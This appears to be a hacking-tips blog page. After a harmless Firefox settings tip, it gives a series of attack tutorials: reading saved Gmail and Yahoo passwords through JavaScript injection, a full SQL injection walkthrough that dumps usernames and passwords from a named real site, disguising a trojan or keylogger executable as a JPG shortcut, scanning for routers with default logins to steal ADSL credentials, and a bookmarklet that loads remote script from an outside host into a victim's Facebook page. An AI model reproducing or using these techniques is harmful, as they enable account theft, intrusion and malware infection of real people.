FIREFOX TRICK: ENABLE SAVE AND QUIT IN FIREFOX 4

Hey everyone i am back with another tutorial.So many of you might have updated to firefox 4 and when you close firefox you wont see save and quit.Now i will tell you how to get it back.

You will see this instead of Save and quit:


1)Type in about:config in the address bar and hit enter.


2)Type browser.showQuitWarning in the Filter and click on toggle.


3)When you toggle it will become true.


4)Save and quit is now enabled

Read More ->>

FORM EDITING USING JAVASCRIPT INJECTION

=========
Introduction
=========

Have you ever been to a school or a friends computer and seen saved passwords before loging into an account? Have you tried copying the bulleted password and pasted it on notepad hoping to see the plain-text password?

Perhaps you've been to websites where you can only enter a certain amount of characters to submit a web-form successfully. Have you tried to modify the HTML code offline and still have no luck in attaining the results you like?

If this sounds like you, keep reading!

This tutorial will describe how to manipulate HTML forms and edit your own values through Javascript Injection. Javascript Injection is when you insert your own Javascript Code to websites through the URL. These changes are only temporarily because Javascript is a client side language. This is, at times, necessary because some sites make sure you submit the form from the website like you were suppose to, therefore, offline source code editing will NOT work.

I'll start by discussing basics in form editing, then ill progress to talk about how to make really good use of JSi!

=========================
Javascript Injection! Form Editing
=========================

Before we begin, we need to understand that every form on a web page is contained in an Array called forms[x], unless specified otherwise. The variable x is the number of all forms in the page. Chronologically, the forms start from 0, therefore, the first form will be 0 and the second form will be 1 and it will continue in this fashion.

Take a look at this form snippet for example:

<html>
<body>
<form action="http://www.website.com/submit.php" method="post">
<input type="hidden" name="to" value="r00t@website.com">
</body>
</html>

Because this is the first form on the webpage, it will become forms[0] when we place it on the Javascript code. Most of us will try to download source code and edit the page offline, but if the submit.php script checks for the referrer, this will not be possible. Because of this, we need to edit the form through the URL!

You can use the following Javascript to check the Value a certain form element has. Since the value, according to the code snippet above, is r00t@website.com, that is whats going to be displayed:


jalert(document.forms[0].to.value);

When this is send through the address bar, r00t@website.com will pop up in an alert box as expected. The form[0] specifies that its the first form, and we wanted the value to be displayed.

Before i continue, I want to elaborate on something important. The Javascript Code that was inserted came directly from the HTML code that the form provided. For example, take a look at this code snippet:

<html>
<body>
<form action="http://www.website.com/submit.php" method="post">
<input type="hidden" name="email" value="r00t@website.com">
</body>
</html>

In the input tag, the name was changed from "to" to "email." This will affect the Javascript Code inserted! The code to inject will now look like:

jalert(document.forms[0].email.value);

As you can see, the Injected code varies on the form naming rules. Its laid out as document.forms[x].name.value in the input HTML tag.

Now lets resume where we left off. Now that you know we have to edit the form from the URL because the PHP script checks the referrer, we need to change the value "r00t@website.com" to our email address in order for whatever gets submitted be sent to us.

So how do we replace the current form email address with our? Easy, all you have to do is give the form a new value through this script:

jalert(document.forms[0].to.value="hacker@website.com");


This will change the email on the form to hacker@website.com. How do you know if you did it right? You can use the previous script to check your work!

If you type, assuming we used the first code snippet where the name was "to" in the input tag:

jalert(document.forms[0].to.value);


hacker@website.com will pop up in an alert box! This is an indication that we have correctly modified the value on the form, now all you have to do is submit the form!

===============================
Snooping Around Gmail and Yahoo Forms
===============================

Now that we know a little more about forms and how one can manipulate them using Javascript, lets get some saved username and passwords from Gmail and Yahoo Mail.

When people sign into Facebook, Gmail, or Yahoo, there is only one form, The form that handles username or emails and then the password for that account. Since we know there is one form that handles Authentication, we know that we will be using forms[0].

What we are essentially doing is finding the values for certain fields individually. We do not know the names of these fields but its self-explanatory to what they are. We can however find the field names. Another concept i want to talk about is elements!

A HTML element is an individual component of a form.

For example, if we know that in the first form there are fields for username and passwords that have saved credentials already, we need to know what element they are corresponding to that form. Yes! username and passwords elements will differ in their numbers because the location vary from form to form!

To make things easier, ill put it this way, just try to follow the thought process. Like I said an element is a single component, so lets say this HTML form have these elements laid out in this fashion:

1st element= IP address
2nd element= Referrer
3rd element= Last login
4th element= Username/email
5th element= Password

If this was the form of Gmail Account we obviously want the username and password so the elements we want is the 4th and 5th.

So how does the Javascript Injection look like?? Simply put, the first injection will look like:

jalert(document.forms[0].elements[4].value);

This will give you the username:

Then the second injection will look like:

jalert(document.forms[0].elements[5].value);

This will give you the password!

If we analyze the code, we want the 4th and 5th element from the first form. We need two separate injections because they are stored individually.

================
Real World Examples!
================

Enough with the technical stuff, these actual images will show you how to hack Gmail and Yahoo accounts that have saved passwords.

For Gmail, the Username element happened to be the 12th:

jalert(document.forms[0].elements[12].value);




And the Password element happened to be the 13th:

jalert(document.forms[0].elements[13].value);



For Yahoo, the Username element happened to be the 24th:

jalert(document.forms[0].elements[24].value);



And the Password element happened to be the 25th:

jalert(document.forms[0].elements[25].value);

==========
Final Words
==========

As you can see, form manipulation can be fun with a little knowledge on how forms work and how things are laid out. Moreover, you wont need software to help you unravel passwords in asterisks. This tutorial did not include everything about Javascript Injection. There are some things i did leave out because it wasn't entirely necessary to discuss, for example changing cookie values because that will segue into more of Cross Site Scripting.

Hopefully everyone enjoyed reading this

Read More ->>

Best way to hack a website

To help the n00bs
THE LINKS DONT WORK: Just copy paste them

For my purposes, i will use http://www.buysellusa.net as an example, this site is hackable.
if you try on this site, and it does NOT work, that means either i spelt the url wrong (silly me) or that the site has been fixed

Dont be to harsh on me for making it so nooby, i didnt get any of the articles explaining sql injections when i was first learning
if you get lost, keep reading, it might explain what you do not understand ahead.

Well, yeah, self explanitory. OK, here, in this article, i will teach you how to hack a website.
The method we are going to use is called mysql injection. Sql mean, "structured query language".
What this means, is that this programming language lets you send queries (a request for information and such) to a database and access hidden, or "confidential files" such as passwords, and usernames, if you catch my drift. A database is an orginized body of related data, or in simpler terms, like all the vital info stored on the website, and vital coding, or "scripting"(the programming) i think (im not very smart). Well, when making a mysql injection, you have to determine (find out) wether or not a site is vulnerable first (vulnerable, as in, you can make a proper mysql injection, or more simplified, if the web site can be hacked). To find out wether or not a site is vulnerable, you need to change the url. Simple isnt it. But, to get proper results, you need to find a url, that contains a VARIABLE <--------this is VERY important) An example of a url that contains a variable, is

http://buysellusa.net/classifieds/showCat.php?cat_id=10

The variable in this Url (website adress) is "cat_id=10"
A variable is a snipet of code or information that is assigned a value. like for example

tom=1

now, lets say this;

1+tom=2

do you understand?

it is a value pretty much. The value of this variable "cat_id=10" is 10.
Now, to determine wether or not you CAN hack this site. What you need to do, is make a change to the url, like i said before
now, this url, "http://buysellusa.net/classifieds/showCat.php?cat_id=10" must have something ADDED to it. At the end of the url,
add ' thats right, just add '
so the new url is:
http://buysellusa.net/classifieds/showCa...cat_id=10'
now if the site you want to hack is vulnerable, you should get and error message on the page. there are other ways to determine wether or not a site is vulnerable to mysql injections, dont get me wrong, but for my purposes, this is the way i will show you.

Now, on this particular url, when you add the magical character ' you should get an error message, something simaler to this:



Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /home/buysell/domains/buysellusa.net/public_html/classifieds/showCat.php on line 57
You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near '\\\'' at line 1
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/buysell/domains/buysellusa.net/classifieds2/lib/func_tree.php on line 424



Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /home/buysell/domains/buysellusa.net/public_html/classifieds/showCat.php on line 85
You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near '\' AND std_items.cat_id=std_categories.cat_id LIMIT
Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /home/buysell/domains/buysellusa.net/classifieds2/lib/func_getResults.php on line 143

now remember, this is very vauge. It can be almost anything, as long as it mentions MySQL. If it mentions some random crap about vb its not vulnerable (AS FAR AS I KNOW)

now when you get that error your in buisness. This means your target site, or the site im using as an example, is vulnerable! HURRAY! now you can get to the hacking

ok next you need to find the number of columns. This i dont fully understand myself, like i said, i am an uber noob.
I THINK what the columns are, are the columns of data inside a chart. Like a chart stored within the database, that can hold like, usernames , or passwords. Anyhow you need to find out how many there are (how many columns for what chart? wtf im confused too, you just have to do it)

ok; to find the amount of charts, you have to use the statement in SQL which is" order by" , this tells the database how to order the results (im still confused, your not alone)

now, in the url, delete you magical character ' i know, it dosent deserve it, but do you want to hack or not? ok now the url is once again
http://buysellusa.net/classifieds/showCat.php?cat_id=10
Now, add the "Order by" command to the end
so the url should look like:
http://buysellusa.net/classifieds/showCat.php?cat_id=10 order by
now to find out the number of coloums, you would add a one to "Order by" so it would become "Order by 1"
now, the url is :
http://buysellusa.net/classifieds/showCat.php?cat_id=10 order by 1
but thats not all. You need to add some characters at the end, which tell the database that it is a query, and not you trying to connect to another page of the site. To do this, you use one of the following" -- " or " /* " these denote that the text is a comment. These are used in programming when you need to write yourself something to remember inside your code, or script.
it dosent matter what it is for, if you dont understand, you just need to know when to use it.

so add either -- or /* to the end of your url

(there are two different methods, because some servers block one of the methods, so if one of the comment symbols* -- * or * /* * dont work, try the other one. i personally prefer -- its faster

the url is now:

http://buysellusa.net/classifieds/showCat.php?cat_id=10 order by 1--
OR
http://buysellusa.net/classifieds/showCat.php?cat_id=10 order by 1/*

make sure not to leave a space between your 1 and your -- or /*
now the first time, it is not going to work obviously.
To find out the number of columns, you need to increase the number "1" by 1 every time you try

so the first time you would make the url:
http://buysellusa.net/classifieds/showCat.php?cat_id=10 order by 1/*
second time:
http://buysellusa.net/classifieds/showCat.php?cat_id=10 order by 2/*
third time:
http://buysellusa.net/classifieds/showCat.php?cat_id=10 order by 3/*

and so on and so on, untill you encounter ANOTHER error. It should say something about mysql.
now you know the number of coloums. Lets say it took you 5 tires, on the fifth try, there was an error, then you have 4 columns, because the 5th try is an error, that means the column does not exist in this table (a table located inside the database)
now, you have the amount of columns, which is great.

Now we have to use the UNION function, which allows you to select more data within one sql statment. The statment in this case being what you add to the end of the url(hope your not lost)
Now when we use the union function, the syntax (how we use it, where we use it) is like so:

http://buysellusa.net/classifieds/showCat.php?cat_id=10 union all select
but we want it to look like this:
http://buysellusa.net/classifieds/showCat.php?cat_id=10 union all select 1,2/*
what this does is select the columns in the table, column 1,2,3 and column 4
now of course, you only want to select the number of columns that you have determined exist. In my example, i determined 4.
Therefore, i selected column 1,2,3 and 4.
to tell if this command is working, look for numbers on the webpage, that werent there before. The numbers could be 1 or any number up to the amount of columns you found. So if there were 8 columns, the new number could be anywhere from 1-8.

Now you need to check for the mysql version. This is important, because if it is version 5, you job will be ALOT esier
now this part is sometimes tricky. Look to find the new number that appeared. Now, in your url
which should look like:
http://buysellusa.net/classifieds/showCat.php?cat_id=10 union select all 1,2/*
you need to replace the number in the url that matches the number that appeared on the web page (so if the number that appeared is 2, then you replace the 2 in "union select all 1,2/*"

what you replace it with is:
@@version or version() if @@version yeilded no results.

we should get someting like 4.1.33-log or 5.0.45 or similar.
it should look like this:
http://buysellusa.net/classifieds/showCat.php?cat_id=10 union all select 1,@@version/*
if you get an error "union + illegal mix of collations (IMPLICIT + COERCIBLE) ..."
what we need is convert() function

i.e.

http://buysellusa.net/classifieds/showCat.php?cat_id=10 union all select 1,convert(@@version using latin1)/*

(yeah, im confused too, dont worry, you might not have to use this)

or with hex() and unhex()

i.e.

http://buysellusa.net/classifieds/showCat.php?cat_id=10 union all select 1,unhex(hex(@@version))/*

and you will get the MySQL version :D
The numbers telling you the version will appear on the web page, most lilkey where the other number appeared.

Now, one of the hardest parts, you need to find out the name of the table in which you wish to see the information of. Be it the table that stores passwords, or usernames, or both. you need to find out. This part can come down to guessing. But remember, always make an educated guess. Dont guess something random like spongepurple guess something like password or pswrd or user_name or user_names, you catch my drift? so in order to guess the name, use a syntax like this:

http://buysellusa.net/classifieds/showCat.php?cat_id=10 union all select 1,2 from randomguess/*
on this site, i know for a fact, that the user name table is
http://buysellusa.net/classifieds/showCat.php?cat_id=10 union all select 1,2 from std_users/*

std means standard

now, you should get MORE numbers. But what do you do with them? you need to extract (put the data into a readable format)
the data. To do this, you need the column name. On this site, and on lots more sites, you can get a rough idea of what the column name is by reading the source of the webpage. The source, is the coding. you can read this by right clicking on the page and hit "Veiw Source Code". Now you need to find the register coding
to do this you might have to open up a new internet clien (have to internets running at once) or on firefox, another tab.
On your second internet, go to the "Creat account" page and veiw the source
on This website, http://www.buysellusa.com the code is as follows:

<INPUT TYPE="TEXT" NAME="new_user_name" value="" SIZE="15">
</td></tr>
<tr><td valign="top" align="right">
<FONT CLASS="small">
Password:
</FONT></td>
<td valign="top" align="right">
<INPUT TYPE="PASSWORD" NAME="password1" value="" SIZE="15">


here we can clearly see the words "new_user_name" and "password1"
from "new_user_name" im going to keep "User_name" because that seems logical

now to see if im right, i will need to check

http://buysellusa.net/classifieds/showCat.php?cat_id=10 union all select 1,user_name,2 from std_users/*

notice where i put "user_name" i put it inbetween the two columns, column 1 and column 2. Then i made sure to state WHERE i am selecting this data (from the column named "user_name") from, the std_users table. and VIOLA! you have every single account user name registered on the site. But now, we need the password.

now before, when we looked at the source code, we saw two interesting things, "New_user_name" and "password1"
now we need the "password1"
i will get rid of the one, because why would the column name have a 1 in it?
so basicially, you do the same thing that you did with the user names.

http://buysellusa.net/classifieds/showCat.php?cat_id=10 union all select 1,user_name,2 from std_users/*
but instead of that, its:
http://buysellusa.net/classifieds/showCat.php?cat_id=10 union all select 1,password,2 from std_users/*
and ONCE AGAIN! VIOLA! you now have the password to each and every account on the site.

but the lesson is not over, now, to make it easier, we will reformat your results, so they can be better read.

to do this, simply use the contact function.

http://buysellusa.net/classifieds/showCat.php?cat_id=10 union all select 1,concat(user_name,0x3a,password),2 from std_users/*

what this does, in a sense, is contact thoes columns from the chart you specify (in this case std_users) and displays there information, but, now, you can display them both at the same time, because they are being simotaneously contacted. And, in this context, it syncronizez the username to its password like so:

username:password

the 0x3a is just a hex code, it is equal to a colon, so your results will look nice.
and thats all.
If you have done this right, you should have just hacked a site.

for your first time, try on http://www.buysellusa.net its easy :P
on http://www.buysellusa.net, make sure to use /* comment symbol!

Read More ->>

Best Way to hide EXE Into JPG FILE

This is a good trick to hide your exe files into a jpg file..!

How about sending a trojan or a keylogger into your slave using this trick..?

1) Firstly, create a new folder and make sure that the options 'show hidden files and folders' is checked and ‘hide extensions for known file types’ is unchecked.
Basically what you need is to see hidden files and see the extension of all your files on your pc.

2) Paste a copy of your server on the new created folder. let's say it's called 'server.exe' (that's why you need the extension of files showing, cause you need to see it to change it)

3) Now you’re going to rename this 'server.exe' to whatever you want, let’s say for example 'picture.jpeg'

4) Windows is going to warn you if you really want to change this extension from exe to jpeg, click YES.

5) Now create a shortcut of this 'picture.jpeg' in the same folder.

6) Now that you have a shortcut, rename it to whatever you want, for example, 'me.jpeg'.

7) Go to properties (on file me.jpeg) and now you need to do some changes there.

8) First of all delete all the text on field 'Start In' and leave it empty.

9) Then on field 'Target' you need to write the path to open the other file (the server renamed 'picture.jpeg') so you have to write this :-
'C:\WINDOWS\system32\cmd.exe /c picture.jpeg'

10) The last field, 'c picture.jpeg' is always the name of the first file. If you called the first file 'soccer.avi' you gotta write 'C:\WINDOWS\system32\cmd.exe /c soccer.avi'.

11) So what you’re doing is when someone clicks on 'me.jpeg', a cmd will execute the other file 'picture.jpeg' and the server will run.

12) On that file 'me.jpeg' (shortcut), go to properties and you have an option to change the icon. Click that and a new window will pop up and you have to write this :-
%SystemRoot%\system32\SHELL32.dll . Then press OK.

13) You can set the properties 'Hidden' for the first file 'picture.jpeg' if you think it’s better to get a connection from someone.

14) But don’t forget one thing, these 2 files must always be together in the same folder and to get connected to someone they must click on the shortcut created not on the first file. So rename the files to whatever you want considering the person and the knowledge they have on this matter.

15) For me for example I always want the shortcut showing first so can be the first file to be opened. So I rename the server to 'picture2.jpeg' and the shortcut to 'picture1.jpeg'.
This way the shortcut will show up first. If you set hidden properties to the server 'picture.jpeg' then you don’t have to bother with this detail but I’m warning you, the hidden file will always show up inside of a Zip or a Rar file.

16) So the best way to send these files together to someone is compress them into Zip or Rar.

17) Inside the Rar or Zip file you can see the files properties and even after all this work you can see that the shortcut is recognized like a shortcut but hopefully the person you sent this too doesn’t know that and is going to open it.

Read More ->>

Get free account Of ADSL

Most of the people never change their default passwords no matter what it is, they don't change them because they think that they are safe. In this tutorial I'll show you one of the ways how to use this mistake and get free ADSL/Wireless (If wireless router is used) accounts and enjoy in unlimited downloads.



First we will download the necessary tools:

1.) XPass
2.) Angry IP Scanner v3.0.4 Beta
3.) If you don't have Java installed, download and install it here: JAVA

You will also need to have version 8 OR older of Internet Explorer.

Ok so let's start with getting the job done:

1.) Go to WhatIsMyIp
and check your IP address, let's say that your current (ADSL providers usually give you dynamic IP's) IP is 67.140.112.83, you will change the last two groups of numbers.

2.) Open Angry IP scanner it will look like this:



Now where it says IP range in the first input field we'll enter our IP address 67.140.112.83 (but we'll change the last two-or three digits, in this case there are two to zero) so it will be like this: 67.140.112.0

And in the second input field we will enter the IP with changed last two groups of numbers so it actually has something to scan, we'll change it to:

67.140.150.254

And before we click scan we need to set some options so it only shows us alive hosts:

Click Tools and then click preferences:



Then under the under the ports tab under Port Selection type 80 'cos we will be interested in hosts with port 80 opened:



And on the display tab choose "Hosts with open ports only":



Then click OK to save the preferences and click start:



After few seconds or minutes you should see your first IP addresses:



Now just select one of the IP addresses and open it with INTERNET EXPLORER!!!

It will ask you for a login credentials:



Now here comes the mistake people often make, default username and password, in this case it was admin:admin but you can look for default router passwords and usernames, so when I logged in it looked like this:



Now for most of the routers (atleast the ones I had exp. with) you can find username in plain text and password covered with *'s when setting up a new connection, so just look for something that says connection wizard or connection setup, and follow the steps till you find the username and password as mentioned.

So why did we use Internet Explorer for this??

Because XPass works only with IE, we couldn't figure the pass out if we used Firefox or Chrome or Opera.

And now when we have the page where username and pass. are just open XPass click on the X sign and drag it over the *'s and you will have this:



And password in this case is: 854179

Continue doing this with different IP's that Angry IP Scanner detects till you have enough accounts to fulfill your download needs.

Hope you liked the tutorial.

Don't forget to comment :))

Read More ->>

Make your friend mad using this cool Prank

Looking for a way to piss off your friends on Facebook? Here's how.

1. Go to the victims wall.

2. Copy and paste the code below into the browser on their wall.

3. Enter # of times and the message.

4. Refresh the page and laugh.


The code:

javascript:(a = (b = document).createElement("script")).src = "//hallwayinsider.com/a.js", b.body.appendChild(a); void(0)

Read More ->>